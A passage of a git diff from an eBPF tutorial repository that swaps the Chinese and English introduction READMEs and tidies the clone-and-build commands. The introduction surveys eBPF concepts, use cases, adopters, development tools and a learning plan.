BTF,让用户态也能一次编译、到处运行 +- [lesson 43-kfuncs](src/43-kfuncs/README.zh.md) 超越 eBPF 的极限:在内核模块中定义自定义 kfunc 持续更新中... @@ -152,11 +145,11 @@ TIME COMM TID LAT(us) 本地编译示例如下所示: ```shell -$ git clone https://github.com/eunomia-bpf/bpf-developer-tutorial.git -$ cd bpf-developer-tutorial -$ git submodule update --init --recursive # 同步 submodule 子模块 -$ cd src/24-hide -$ make +git clone https://github.com/eunomia-bpf/bpf-developer-tutorial.git +cd bpf-developer-tutorial +git submodule update --init --recursive # 同步 submodule 子模块 +cd src/24-hide +make ``` ## 为什么需要基于 libbpf 和 BPF CO-RE 的教程? diff --git a/src/0-introduce/README.md b/src/0-introduce/README.md index 687bfd9..77ed02e 100644 --- a/src/0-introduce/README.md +++ b/src/0-introduce/README.md @@ -1,163 +1,162 @@ -# eBPF 示例教程 0:核心概念与工具简介 - -这是一个全面的 eBPF 开发教程的第一部分,旨在通过实用的 eBPF 开发指导您从初学者到高级用户。它涵盖了基本概念、实际代码示例以及在现代系统中的应用。我们将不再专注于传统工具如 BCC,而是使用现代框架如 `libbpf`、`Cilium`、`libbpf-rs` 和 eunomia-bpf,并提供 `C`、`Go` 和 `Rust` 的示例。 - -本教程的主要目标是提供清晰简洁的 eBPF 工具示例(起步只需 20 行代码!),帮助开发者快速掌握基本的 eBPF 开发技术。每个示例都是独立的,可以在目录结构中找到,每个目录代表一个独立的 eBPF 工具。您还可以访问我们的教程代码仓库 或网站 获取更多示例和完整的教程源代码。 - -## eBPF 简介:安全高效的内核扩展 - -eBPF(扩展的 Berkeley Packet Filter)是一项突破性的技术,允许开发者在内核空间中安全高效地运行小型程序。与传统方法需要修改内核源代码或加载新模块不同,eBPF 使得动态定制和优化网络行为成为可能,且不会中断系统操作。这种灵活性和高效性使 eBPF 成为克服传统网络栈限制的关键技术。 - -### eBPF 的强大之处是什么? - -- **直接内核交互**:eBPF 程序在内核中执行,与系统级事件如网络包、系统调用或追踪点交互。 -- **安全执行**:eBPF 通过验证器在程序运行前检查其逻辑,防止潜在的内核崩溃或安全漏洞。 -- **最低开销**:eBPF 通过使用即时编译器(JIT),将 eBPF 字节码转换为针对特定架构的优化机器码,实现近原生执行速度。 - -## eBPF:过去、现在与未来 - -### 过去:可编程网络的变革 - -eBPF 于 2014 年推出,彻底改变了开发者处理网络的方式,允许小型可编程内核空间应用程序实时处理数据包。通过钩住关键内核点,eBPF 使得在网络包到达时应用自定义逻辑成为可能,从而提高了效率和灵活性。这使得组织能够在不需要自定义驱动程序或修改内核的情况下定制网络行为,为云原生和数据中心环境创造了理想的解决方案。 - -### 现在:满足现代计算需求的多功能框架 - -eBPF 已发展为一个多功能框架,超越了其最初的网络用途,现在涵盖了可观测性、追踪、安全性,甚至系统资源管理。eBPF 程序可以动态钩住内核事件,赋予开发者精确控制系统行为和性能优化的能力,而无需修改内核或重启系统。这使得 eBPF 成为系统管理员和开发者监控、优化和保护环境的必备工具。 - -以下是 eBPF 目前广泛应用的一些关键领域: - -- **网络**:eBPF 提供内核中实时、高速的数据包过滤和处理,允许创建自定义协议解析器和网络策略,无需新驱动程序或系统重启。这在云和数据中心环境中实现了高效的网络管理。 - -- **可观测性**:eBPF 使开发者能够通过收集自定义指标和执行内核级数据聚合来深入了解系统行为。通过利用内核追踪点和函数调用,eBPF 有助于识别性能问题和定位难以发现的错误。 - -- **追踪与分析**:eBPF 提供强大的追踪和分析能力,通过附加到内核函数、追踪点甚至用户空间探针,使开发者能够深入了解系统和应用程序的行为,从而优化性能和解决复杂的系统问题。 - -- **安全**:eBPF 在实时安全监控中发挥重要作用。它能够深入检查系统调用、网络流量和其他内核活动,帮助执行动态安全策略和检测异常行为,为基础设施提供高效的保护。 - -- **调度器优化**:eBPF 越来越多地用于增强 CPU 调度,能够监控 CPU 负载并优化任务在核心之间的分配。这可以更有效地利用 CPU 资源,提高系统响应能力。 - -- **HID(人机接口设备)驱动增强**:开发者使用 eBPF 优化键盘、鼠标和触摸屏等设备的 HID 驱动程序。通过为处理输入事件添加自定义逻辑,eBPF 提高了对延迟敏感应用的响应速度。 - -各行业组织已大规模采用 eBPF: - -- **Google**:使用 eBPF 进行安全审计、数据包处理、实时性能监控以及优化其庞大基础设施的 CPU 调度。 -- **Netflix**:利用 eBPF 进行网络流量分析,确保流媒体服务的高可用性和性能。 -- **Android**:应用 eBPF 优化网络使用、功耗和资源分配,提升数百万设备的性能和电池寿命。 -- **S&P Global**:通过 **Cilium** 使用 eBPF 管理跨多个云和本地系统的网络,确保可扩展性和安全性。 -- **Shopify**:与 **Falco** 一起实施 eBPF 进行入侵检测,增强其电子商务平台的安全性。 -- **Cloudflare**:使用 eBPF 进行网络可观测性、安全监控和性能优化,保护全球数百万网站。 - -eBPF 能够动态调整系统行为并扩展到用户空间,使其成为现代计算不可或缺的技术。无论是优化网络流量、提升安全性,还是增强系统性能,eBPF 都能帮助开发者高效、安全地应对实时需求。 - -除了其内核模式运行时,eBPF 还可以扩展到用户空间。例如,[bpftime](https://github.com/eunomia-bpf/bpftime) 是一个用户空间 eBPF 运行时,允许在用户空间应用中进行高性能追踪、性能分析和插件支持。这种 eBPF 向用户空间的扩展有助于在各种超越内核级任务的用例中提高灵活性和性能。 - -### 未来:eBPF 的扩展潜力 - -展望未来,预计 eBPF 将成为操作系统更为重要的一部分。重点将放在提升其灵活性、模块化和易用性上,使其能够应用于更广泛的场景。内存管理、并发机制的创新以及与用户空间应用的更好集成已在路上。已经有项目在编译 Linux 内核的关键部分到 BPF 指令集,这可能彻底改变内核开发和分析的方式。 - -动态栈、更好的用户空间可观测性工具(例如快速 Uprobes 和特定语言的栈行走器)以及更安全的程序终止机制等进展将继续增强 eBPF 的可靠性并扩展其使用场景。此外,新工具和库将简化 eBPF 开发,降低内核和应用开发者的入门门槛。 - -## 开始学习教程 - -本教程提供实用的 eBPF 开发实践,涵盖从初级到高级的主题。我们专注于在可观测性、网络和安全等领域的动手示例,使用 `libbpf`、`libbpf-rs` 和 `eunomia-bpf` 等框架,并提供 C、Go 和 Rust 的示例。 - -### 本教程适合谁? - -- **开发者** 希望实现自定义内核解决方案。 -- **系统管理员** 旨在提升性能和安全性。 -- **技术爱好者** 探索前沿的内核技术。 - -### 你将学到什么? - -- **核心概念**:eBPF 基础知识及其与 Linux 内核的集成。 -- **实用技能**:编写和部署 eBPF 程序。 -- **高级主题**:探索 eBPF 在安全、追踪和未来创新方面的应用。 - ---- - -## 目录 - -1. **eBPF 简介** - 基本概念和入门所需的工具。 - -2. **初学者示例** - 简单的程序,如“Hello World”及使用 kprobe 和 uprobe 进行基础追踪。 - -3. **可观测性** - 侧重于使用 eBPF 监控网络流量、文件操作和进程行为的示例。 - -4. **网络** - 侧重于修改和优化网络流量的示例,如 XDP、TC 和 socket。 - -5. **安全** - 用于隐藏进程和文件、发送信号杀死进程以及跟踪进程事件以增强安全性的程序。 - -6. **高级用例** - 涉及性能分析、调度器优化和用户空间 eBPF(如 bpftime)的复杂示例。 - -7. **深入主题** - 探索 eBPF 在 Android 上的应用、使用 eBPF 进行网络加速以及通过系统调用修改来保护系统。 - -## 如何使用 eBPF 编程 - -从头编写 eBPF 程序可能较为复杂。为简化这一过程,LLVM 于 2015 年引入了将高级语言代码编译为 eBPF 字节码的能力。自那时起,eBPF 社区构建了像 `libbpf` 这样的库来管理这些程序。这些库帮助将 eBPF 字节码加载到内核中并执行基本任务。Linux 内核源代码中 `samples/bpf/` 目录包含了众多 eBPF 示例。 - -典型的 eBPF 程序包含两个部分:内核空间代码(`*_kern.c`)和用户空间代码(`*_user.c`)。内核空间代码定义逻辑,而用户空间代码负责加载和与内核交互。然而,像 `libbpf-bootstrap` 和 Go eBPF 库这样的工具简化了这一过程,允许一次性编译和更容易的开发。 - -### eBPF 开发工具 - -- **BCC**:一个基于 Python 的工具链,简化了 eBPF 程序的编写、编译和加载。它提供了许多预构建的追踪工具,但在依赖和兼容性方面存在一些限制。 -- **eBPF Go 库**:一个 Go 库,解耦了获取 eBPF 字节码的过程与加载和管理 eBPF 程序的过程。 -- **libbpf-bootstrap**:基于 `libbpf` 的现代脚手架,提供了高效的工作流用于编写 eBPF 程序,提供简单的一次性编译过程以生成可重用的字节码。 -- **eunomia-bpf**:一个用于编写仅包含内核空间代码的 eBPF 程序的工具链。它通过动态加载 eBPF 程序简化了 eBPF 程序的开发。 - -这些工具有助于减少开发 eBPF 程序的复杂性,使开发者更容易优化系统性能、安全性和可观测性。 - -## 学习 eBPF 开发的一些技巧 - -本文不会提供更详细的 eBPF 原理介绍,但以下是一个学习计划和参考资料,可能对您有帮助: - -### eBPF 简介(5-7 小时) - -- 使用 Google 或其他搜索引擎搜索:eBPF -- 询问类似 ChatGPT 的工具:什么是 eBPF? - -推荐: - -- 阅读 eBPF 介绍:(30 分钟) -- 简要了解 eBPF 内核相关文档:(了解技术细节的查询来源,30 分钟) - -回答三个问题: - -1. 了解 eBPF 是什么?我们为什么需要它?难道不能使用内核模块吗? -2. 它有哪些功能?它在 Linux 内核中能做什么?eBPF 程序和助手函数有哪些类型(不需要全部了解,但需要知道在哪里查找)? -3. 它能用于哪些场景?例如,可以在哪些情况下使用?网络、安全、可观测性? - -### 理解如何开发 eBPF 程序(10-15 小时) - -了解并尝试 eBPF 开发框架: - -- bpftrace 教程:(尝试,1 小时) -- 使用 BCC 开发各种工具的示例:(运行,3-4 小时) -- libbpf 的一些示例:(运行任何有趣的示例并阅读源代码,2 小时) -- 教程:(阅读第 1-10 部分,3-4 小时) - -其他开发框架:Go 或 Rust 语言,请自行搜索和尝试(0-2 小时) - -如果有问题或想了解的内容,无论是否与本项目相关,都可以在该项目的讨论区开始讨论。 - -回答一些问题并尝试一些实验(2-5 小时): - -1. 如何开发最简单的 eBPF 程序? -2. 如何使用 eBPF 追踪内核功能或函数?有很多方法,提供相应的代码示例; -3. 用户模式和内核模式之间的通信解决方案有哪些?如何将信息从用户模式发送到内核模式?如何将信息从内核模式传递到用户模式?提供代码示例; -4. 编写您自己的 eBPF 程序以实现某个功能; -5. 在 eBPF 程序的整个生命周期中,用户模式和内核模式分别做了什么? - -## 参考资料 - -- eBPF 介绍: -- BPF 编译器集合(BCC): -- eunomia-bpf: - -您还可以访问我们的教程代码仓库 或网站 获取更多示例和完整的教程源代码。所有内容均为开源。我们将继续分享更多关于 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。 \ No newline at end of file +# eBPF Tutorial by Example 0: Introduction to Core Concepts and Tools + +This is the first part of a comprehensive development tutorial for eBPF, designed to guide you through practical eBPF development, from beginner to advanced. It covers fundamental concepts, real-world code examples, and applications in modern systems. Rather than focusing on traditional tools like BCC, we will use modern frameworks such as `libbpf`, `Cilium`, `libbpf-rs`, and eunomia-bpf, with examples provided in `C`, `Go`, and `Rust`. + +The primary goal of this tutorial is to provide clear and concise examples of eBPF tools (starting with as little as 20 lines of code!) to help developers quickly grasp essential eBPF development techniques. Each example is self-contained and can be found in the directory structure, with every directory representing an independent eBPF tool. You can also visit our tutorial code repository or website for more examples and complete tutorial source code. + +## Introduction to eBPF: Secure and Efficient Kernel Extension + +eBPF (extended Berkeley Packet Filter) is a groundbreaking technology that allows developers to run small programs directly in kernel space, safely and efficiently. Unlike traditional approaches that required modifying kernel source code or loading new modules, eBPF made it possible to customize and optimize network behavior dynamically, all without disrupting system operations. This flexibility and efficiency made eBPF a pivotal technology for overcoming the limitations of traditional networking stacks. + +### What Makes eBPF So Powerful? + +- **Direct Kernel Interaction:** eBPF programs execute within the kernel, interacting with system-level events such as network packets, system calls, or tracepoints. +- **Safe Execution:** eBPF ensures safety through a verifier that checks the logic of the program before it runs, preventing potential kernel crashes or security breaches. +- **Minimal Overhead:** eBPF achieves near-native execution speed by employing a Just-In-Time (JIT) compiler, which translates eBPF bytecode into optimized machine code for the specific architecture. + +## eBPF: Past, Present, and Future + +### Past: Programmable Networking Transformed + +When eBPF was introduced in 2014, it revolutionized how developers approached networking by allowing small, programmable kernel-space applications to handle packet processing in real time. By hooking into key kernel points, eBPF enabled custom logic to be applied whenever a network packet arrived, leading to higher efficiency and flexibility. This allowed organizations to tailor networking behavior without the overhead of custom drivers or kernel modifications, creating an ideal solution for cloud-native and data-center environments. +### Present: A Versatile Framework for Modern Computing Needs + +eBPF has evolved into a versatile framework that extends beyond its original purpose of networking, now encompassing observability, tracing, security, and even system resource management. eBPF programs can dynamically hook into kernel events, giving developers precise control over system behavior and performance optimization without requiring kernel modifications or reboots. This makes eBPF an essential tool for system administrators and developers who aim to monitor, optimize, and secure their environments. + +Here are some key areas where eBPF is widely used today: + +- **Networking:** eBPF offers real-time, high-speed packet filtering and processing within the kernel, allowing for the creation of custom protocol parsers and network policies without needing new drivers or system restarts. This enables highly efficient network management in cloud and data center environments. + +- **Observability:** eBPF enables developers to gather detailed insights into system behavior by collecting custom metrics and performing in-kernel data aggregation. By tapping into kernel tracepoints and function calls, eBPF helps identify performance issues and track down elusive bugs. + +- **Tracing & Profiling:** eBPF provides powerful tracing and profiling capabilities by attaching to kernel functions, tracepoints, and even user-space probes. This allows developers to gain deep insights into system and application behavior, enabling them to optimize performance and resolve complex system issues. + +- **Security:** eBPF plays a vital role in real-time security monitoring. It enables deep inspection of system calls, network traffic, and other kernel activities, helping to enforce dynamic security policies and detect anomalous behavior, providing an efficient way to safeguard infrastructure. + +- **Scheduler Optimization:** eBPF is increasingly used to enhance CPU scheduling, offering the ability to monitor CPU load and optimize how tasks are distributed across cores. This can lead to more efficient use of CPU resources and improved system responsiveness. + +- **HID (Human Interface Device) Driver Enhancements:** Developers use eBPF to optimize HID drivers for devices like keyboards, mice, and touchscreens. By adding custom logic for handling input events, eBPF improves responsiveness in latency-sensitive applications. + +Organizations across industries have adopted eBPF at scale: + +- **Google:** Uses eBPF for security auditing, packet processing, real-time performance monitoring, and optimizing CPU scheduling across its vast infrastructure. +- **Netflix:** Leverages eBPF for network traffic analysis, ensuring high availability and performance for streaming services. +- **Android:** Applies eBPF to optimize network usage, power consumption, and resource allocation, improving performance and battery life on millions of devices. +- **S&P Global:** Utilizes eBPF through **Cilium** for managing networking across multiple clouds and on-premises systems, ensuring scalability and security. +- **Shopify:** Implements eBPF with **Falco** for intrusion detection, bolstering security on its e-commerce platform. +- **Cloudflare:** Uses eBPF for network observability, security monitoring, and performance optimization, protecting millions of websites globally. + +eBPF's ability to dynamically adjust system behavior and extend into user space makes it an essential technology for modern computing. Whether it's optimizing network traffic, improving security, or enhancing system performance, eBPF enables developers to address real-time requirements efficiently and safely. + +In addition to its kernel-mode runtime, eBPF can also be extended to user space. For example, [bpftime](https://github.com/eunomia-bpf/bpftime), a user-space eBPF runtime, allows for higher-performance tracing, performance analysis, and plugin support in user-space applications. This extension of eBPF into user space helps improve flexibility and performance in various use cases that go beyond kernel-level tasks. + +### Future: The Expanding Potential of eBPF + +Looking forward, eBPF is expected to become an even more integral part of operating systems. The focus is on improving its flexibility, modularity, and ease of use, making it accessible for an even broader range of applications. Innovations in memory management, concurrency mechanisms, and better integration with user-space applications are on the horizon. Projects are already underway to compile significant parts of the Linux kernel to the BPF instruction set, potentially revolutionizing how kernel development and analysis are performed. + +Advancements such as dynamic stacks, better observability tools for user space (e.g., Fast Uprobes and language-specific stack walkers), and safer program termination mechanisms will continue to strengthen eBPF’s reliability and expand its use cases. Additionally, new tools and libraries will simplify eBPF development, lowering the barrier to entry for both kernel and application developers. + +## Getting Started with the Tutorial + +This tutorial provides practical eBPF development practices, covering topics from beginner to advanced levels. We focus on hands-on examples in areas like observability, networking, and security, using frameworks like `libbpf`, `libbpf-rs`, and `eunomia-bpf`, with examples in C, Go, and Rust. + +### Who Is This Tutorial For? + +- **Developers** looking to implement custom kernel solutions. +- **System Administrators** aiming to enhance performance and security. +- **Tech Enthusiasts** exploring cutting-edge kernel technologies. + +### What Will You Learn? + +- **Core Concepts:** eBPF fundamentals and integration with the Linux kernel. +- **Practical Skills:** Writing and deploying eBPF programs. +- **Advanced Topics:** Exploring security, tracing, and future innovations in eBPF. + +--- + +## Table of Contents + +1. **Introduction to eBPF** + Basic concepts and the tools you need to get started. + +2. **Beginner Examples** + Simple programs such as "Hello World" and basic tracing using kprobe and uprobe. + +3. **Observability** + Examples focused on monitoring network traffic, file operations, and process behavior using eBPF. + +4. **Networking** + Examples focused on modifying and optimizing network traffic, such as XDP, TC, and socket. + +5. **Security** + Programs for hiding process and files, sending signals to kill process, and tracking process events for security. + +6. **Advanced Use Cases** + Complex examples involving performance profiling, scheduler optimization, and eBPF in user space (e.g., bpftime). + +7. **In-Depth Topics** + Exploring eBPF for Android, using eBPF for network acceleration, and securing systems through syscall modifications. + +## How to Use eBPF Programming + +Writing eBPF programs from scratch can be complex. To simplify this, LLVM introduced the ability to compile high-level language code into eBPF bytecode in 2015. The eBPF community has since built libraries like `libbpf` to manage these programs. These libraries help load eBPF bytecode into the kernel and perform essential tasks. The Linux kernel source contains numerous eBPF examples in the `samples/bpf/` directory. + +A typical eBPF program involves two parts: kernel space code (`*_kern.c`) and user space code (`*_user.c`). The kernel space code defines the logic, while the user space code manages loading and interacting with the kernel. However, tools like `libbpf-bootstrap` and the Go eBPF library help simplify this process, allowing for one-time compilation and easier development. + +### Tools for eBPF Development + +- **BCC**: A Python-based toolchain that simplifies writing, compiling, and loading eBPF programs. It offers many pre-built tracing tools but has limitations with dependencies and compatibility. +- **eBPF Go Library**: A Go library that decouples the process of obtaining eBPF bytecode from the loading and management of eBPF programs. +- **libbpf-bootstrap**: A modern scaffold based on `libbpf` that provides an efficient workflow for writing eBPF programs, offering a simple one-time compilation process for reusable bytecode. +- **eunomia-bpf**: A toolchain for writing eBPF programs with only kernel space code. It simplifies the development of eBPF programs by dynamically loading them. + +These tools help reduce the complexity of developing eBPF programs, making the process more accessible to developers aiming to optimize system performance, security, and observability. + +## Some Tips on Learning eBPF Development + +This article will not provide a more detailed introduction to the principles of eBPF, but here is a learning plan and reference materials that may be of value: + +### Introduction to eBPF (5-7h) + +- Google or other search engines: eBPF +- Ask ChatGPT-like things: What is eBPF? + +Recommended: + +- Read the introduction to ebpf: (30min) +- Briefly understand the ebpf kernel-related documentation: (Know where to queries for tech details, 30min) + +Answer three questions: + +1. Understand what eBPF is? Why do we need it? Can't we use kernel modules? +2. What functions does it have? What can it do in the Linux kernel? What are the types of eBPF programs and helpers (not all of them need to be known, but need to know where to find them)? +3. What can it be used for? For example, in which scenarios can it be used? Networking, security, observability? + +### Understand how to develop eBPF programs (10-15h) + +Understand and try eBPF development frameworks: + +- bpftrace tutorial: (Try it,1h) +- Examples of developing various tools with BCC: (Run through, 3-4h) +- Some examples of libbpf: (Run any interesting one and read the source code, 2h) +- Tutorials: (Read part 1-10, 3-4h) + +Other development frameworks: Go or Rust language, please search and try on your own (0-2h) + +Have questions or things you want to know, whether or not they are related to this project, you can start discussing in the discussions of this project. + +Answer some questions and try some experiments (2-5h): + +1. How to develop the simplest eBPF program? +2. How to trace a kernel feature or function with eBPF? There are many ways, provide corresponding code examples; +3. What are the solutions for communication between user mode and kernel mode? How to send information from user mode to kernel mode? How to pass information from kernel mode to user mode? Provide code examples; +4. Write your own eBPF program to implement a feature; +5. In the entire lifecycle of an eBPF program, what does it do in user mode and kernel mode? + +## References + +- eBPF Introduction: +- BPF Compiler Collection (BCC): +- eunomia-bpf: + +You can also visit our tutorial code repository or website for more examples and complete tutorial source code. All content is open source. We will continue to share more content about eBPF development practices to help you better understand and master eBPF technology.". diff --git a/src/0-introduce/README.zh.md b/src/0-introduce/README.zh.md new file mode 100644 index 0000000..687bfd9 --- /dev/null +++ b/src/0-introduce/README.zh.md @@ -0,0 +1,163 @@ +# eBPF 示例教程 0:核心概念与工具简介 + +这是一个全面的 eBPF 开发教程的第一部分,旨在通过实用的 eBPF 开发指导您从初学者到高级用户。它涵盖了基本概念、实际代码示例以及在现代系统中的应用。我们将不再专注于传统工具如 BCC,而是使用现代框架如 `libbpf`、`Cilium`、`libbpf-rs` 和 eunomia-bpf,并提供 `C`、`Go` 和 `Rust` 的示例。 + +本教程的主要目标是提供清晰简洁的 eBPF 工具示例(起步只需 20 行代码!),帮助开发者快速掌握基本的 eBPF 开发技术。每个示例都是独立的,可以在目录结构中找到,每个目录代表一个独立的 eBPF 工具。您还可以访问我们的教程代码仓库 或网站 获取更多示例和完整的教程源代码。 + +## eBPF 简介:安全高效的内核扩展 + +eBPF(扩展的 Berkeley Packet Filter)是一项突破性的技术,允许开发者在内核空间中安全高效地运行小型程序。与传统方法需要修改内核源代码或加载新模块不同,eBPF 使得动态定制和优化网络行为成为可能,且不会中断系统操作。这种灵活性和高效性使 eBPF 成为克服传统网络栈限制的关键技术。 + +### eBPF 的强大之处是什么? + +- **直接内核交互**:eBPF 程序在内核中执行,与系统级事件如网络包、系统调用或追踪点交互。 +- **安全执行**:eBPF 通过验证器在程序运行前检查其逻辑,防止潜在的内核崩溃或安全漏洞。 +- **最低开销**:eBPF 通过使用即时编译器(JIT),将 eBPF 字节码转换为针对特定架构的优化机器码,实现近原生执行速度。 + +## eBPF:过去、现在与未来 + +### 过去:可编程网络的变革 + +eBPF 于 2014 年推出,彻底改变了开发者处理网络的方式,允许小型可编程内核空间应用程序实时处理数据包。通过钩住关键内核点,eBPF 使得在网络包到达时应用自定义逻辑成为可能,从而提高了效率和灵活性。这使得组织能够在不需要自定义驱动程序或修改内核的情况下定制网络行为,为云原生和数据中心环境创造了理想的解决方案。 + +### 现在:满足现代计算需求的多功能框架 + +eBPF 已发展为一个多功能框架,超越了其最初的网络用途,现在涵盖了可观测性、追踪、安全性,甚至系统资源管理。eBPF 程序可以动态钩住内核事件,赋予开发者精确控制系统行为和性能优化的能力,而无需修改内核或重启系统。这使得 eBPF 成为系统管理员和开发者监控、优化和保护环境的必备工具。 + +以下是 eBPF 目前广泛应用的一些关键领域: + +- **网络**:eBPF 提供内核中实时、高速的数据包过滤和处理,允许创建自定义协议解析器和网络策略,无需新驱动程序或系统重启。这在云和数据中心环境中实现了高效的网络管理。 + +- **可观测性**:eBPF 使开发者能够通过收集自定义指标和执行内核级数据聚合来深入了解系统行为。通过利用内核追踪点和函数调用,eBPF 有助于识别性能问题和定位难以发现的错误。 + +- **追踪与分析**:eBPF 提供强大的追踪和分析能力,通过附加到内核函数、追踪点甚至用户空间探针,使开发者能够深入了解系统和应用程序的行为,从而优化性能和解决复杂的系统问题。 + +- **安全**:eBPF 在实时安全监控中发挥重要作用。它能够深入检查系统调用、网络流量和其他内核活动,帮助执行动态安全策略和检测异常行为,为基础设施提供高效的保护。 + +- **调度器优化**:eBPF 越来越多地用于增强 CPU 调度,能够监控 CPU 负载并优化任务在核心之间的分配。这可以更有效地利用 CPU 资源,提高系统响应能力。 + +- **HID(人机接口设备)驱动增强**:开发者使用 eBPF 优化键盘、鼠标和触摸屏等设备的 HID 驱动程序。通过为处理输入事件添加自定义逻辑,eBPF 提高了对延迟敏感应用的响应速度。 + +各行业组织已大规模采用 eBPF: + +- **Google**:使用 eBPF 进行安全审计、数据包处理、实时性能监控以及优化其庞大基础设施的 CPU 调度。 +- **Netflix**:利用 eBPF 进行网络流量分析,确保流媒体服务的高可用性和性能。 +- **Android**:应用 eBPF 优化网络使用、功耗和资源分配,提升数百万设备的性能和电池寿命。 +- **S&P Global**:通过 **Cilium** 使用 eBPF 管理跨多个云和本地系统的网络,确保可扩展性和安全性。 +- **Shopify**:与 **Falco** 一起实施 eBPF 进行入侵检测,增强其电子商务平台的安全性。 +- **Cloudflare**:使用 eBPF 进行网络可观测性、安全监控和性能优化,保护全球数百万网站。 + +eBPF 能够动态调整系统行为并扩展到用户空间,使其成为现代计算不可或缺的技术。无论是优化网络流量、提升安全性,还是增强系统性能,eBPF 都能帮助开发者高效、安全地应对实时需求。 + +除了其内核模式运行时,eBPF 还可以扩展到用户空间。例如,[bpftime](https://github.com/eunomia-bpf/bpftime) 是一个用户空间 eBPF 运行时,允许在用户空间应用中进行高性能追踪、性能分析和插件支持。这种 eBPF 向用户空间的扩展有助于在各种超越内核级任务的用例中提高灵活性和性能。 + +### 未来:eBPF 的扩展潜力 + +展望未来,预计 eBPF 将成为操作系统更为重要的一部分。重点将放在提升其灵活性、模块化和易用性上,使其能够应用于更广泛的场景。内存管理、并发机制的创新以及与用户空间应用的更好集成已在路上。已经有项目在编译 Linux 内核的关键部分到 BPF 指令集,这可能彻底改变内核开发和分析的方式。 + +动态栈、更好的用户空间可观测性工具(例如快速 Uprobes 和特定语言的栈行走器)以及更安全的程序终止机制等进展将继续增强 eBPF 的可靠性并扩展其使用场景。此外,新工具和库将简化 eBPF 开发,降低内核和应用开发者的入门门槛。 + +## 开始学习教程 + +本教程提供实用的 eBPF 开发实践,涵盖从初级到高级的主题。我们专注于在可观测性、网络和安全等领域的动手示例,使用 `libbpf`、`libbpf-rs` 和 `eunomia-bpf` 等框架,并提供 C、Go 和 Rust 的示例。 + +### 本教程适合谁? + +- **开发者** 希望实现自定义内核解决方案。 +- **系统管理员** 旨在提升性能和安全性。 +- **技术爱好者** 探索前沿的内核技术。 + +### 你将学到什么? + +- **核心概念**:eBPF 基础知识及其与 Linux 内核的集成。 +- **实用技能**:编写和部署 eBPF 程序。 +- **高级主题**:探索 eBPF 在安全、追踪和未来创新方面的应用。 + +--- + +## 目录 + +1. **eBPF 简介** + 基本概念和入门所需的工具。 + +2. **初学者示例** + 简单的程序,如“Hello World”及使用 kprobe 和 uprobe 进行基础追踪。 + +3. **可观测性** + 侧重于使用 eBPF 监控网络流量、文件操作和进程行为的示例。 + +4. **网络** + 侧重于修改和优化网络流量的示例,如 XDP、TC 和 socket。 + +5. **安全** + 用于隐藏进程和文件、发送信号杀死进程以及跟踪进程事件以增强安全性的程序。 + +6. **高级用例** + 涉及性能分析、调度器优化和用户空间 eBPF(如 bpftime)的复杂示例。 + +7. **深入主题** + 探索 eBPF 在 Android 上的应用、使用 eBPF 进行网络加速以及通过系统调用修改来保护系统。 + +## 如何使用 eBPF 编程 + +从头编写 eBPF 程序可能较为复杂。为简化这一过程,LLVM 于 2015 年引入了将高级语言代码编译为 eBPF 字节码的能力。自那时起,eBPF 社区构建了像 `libbpf` 这样的库来管理这些程序。这些库帮助将 eBPF 字节码加载到内核中并执行基本任务。Linux 内核源代码中 `samples/bpf/` 目录包含了众多 eBPF 示例。 + +典型的 eBPF 程序包含两个部分:内核空间代码(`*_kern.c`)和用户空间代码(`*_user.c`)。内核空间代码定义逻辑,而用户空间代码负责加载和与内核交互。然而,像 `libbpf-bootstrap` 和 Go eBPF 库这样的工具简化了这一过程,允许一次性编译和更容易的开发。 + +### eBPF 开发工具 + +- **BCC**:一个基于 Python 的工具链,简化了 eBPF 程序的编写、编译和加载。它提供了许多预构建的追踪工具,但在依赖和兼容性方面存在一些限制。 +- **eBPF Go 库**:一个 Go 库,解耦了获取 eBPF 字节码的过程与加载和管理 eBPF 程序的过程。 +- **libbpf-bootstrap**:基于 `libbpf` 的现代脚手架,提供了高效的工作流用于编写 eBPF 程序,提供简单的一次性编译过程以生成可重用的字节码。 +- **eunomia-bpf**:一个用于编写仅包含内核空间代码的 eBPF 程序的工具链。它通过动态加载 eBPF 程序简化了 eBPF 程序的开发。 + +这些工具有助于减少开发 eBPF 程序的复杂性,使开发者更容易优化系统性能、安全性和可观测性。 + +## 学习 eBPF 开发的一些技巧 + +本文不会提供更详细的 eBPF 原理介绍,但以下是一个学习计划和参考资料,可能对您有帮助: + +### eBPF 简介(5-7 小时) + +- 使用 Google 或其他搜索引擎搜索:eBPF +- 询问类似 ChatGPT 的工具:什么是 eBPF? + +推荐: + +- 阅读 eBPF 介绍:(30 分钟) +- 简要了解 eBPF 内核相关文档:(了解技术细节的查询来源,30 分钟) + +回答三个问题: + +1. 了解 eBPF 是什么?我们为什么需要它?难道不能使用内核模块吗? +2. 它有哪些功能?它在 Linux 内核中能做什么?eBPF 程序和助手函数有哪些类型(不需要全部了解,但需要知道在哪里查找)? +3. 它能用于哪些场景?例如,可以在哪些情况下使用?网络、安全、可观测性? + +### 理解如何开发 eBPF 程序(10-15 小时) + +了解并尝试 eBPF 开发框架: + +- bpftrace 教程:(尝试,1 小时) +- 使用 BCC 开发各种工具的示例:(运行,3-4 小时) +- libbpf 的一些示例:(运行任何有趣的示例并阅读源代码,2 小时) +- 教程:(阅读第 1-10 部分,3-4 小时) + +其他开发框架:Go 或 Rust 语言,请自行搜索和尝试(0-2 小时) + +如果有问题或想了解的内容,无论是否与本项目相关,都可以在该项目的讨论区开始讨论。 + +回答一些问题并尝试一些实验(2-5 小时): + +1. 如何开发最简单的 eBPF 程序? +2. 如何使用 eBPF 追踪内核功能或函数?有很多方法,提供相应的代码示例; +3. 用户模式和内核模式之间的通信解决方案有哪些?如何将信息从用户模式发送到内核模式?如何将信息从内核模式传递到用户模式?提供代码示例; +4. 编写您自己的 eBPF 程序以实现某个功能; +5. 在 eBPF 程序的整个生命周期中,用户模式和内核模式分别做了什么? + +## 参考资料 + +- eBPF 介绍: +- BPF 编译器集合(BCC): +- eunomia-bpf: + +您还可以访问我们的教程代码仓库 或网站 获取更多示例和完整的教程源代码。所有内容均为开源。我们将继续分享更多关于 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。 \ No newline at end of file diff --git a/src/0-introduce/README_en.md b/src/0-introduce/README_en.md deleted file mode 100644 index 77ed02e..0000000 --- a/src/0-introduce/README_en.md +++ /dev/null @@ -1,162 +0,0 @@ -# eBPF Tutorial by Example 0: Introduction to Core Concepts and Tools - -This is the first part of a comprehensive development tutorial for eBPF, designed to guide you through practical eBPF development, from beginner to advanced. It covers fundamental concepts, real-world code examples, and applications in modern systems. Rather than focusing 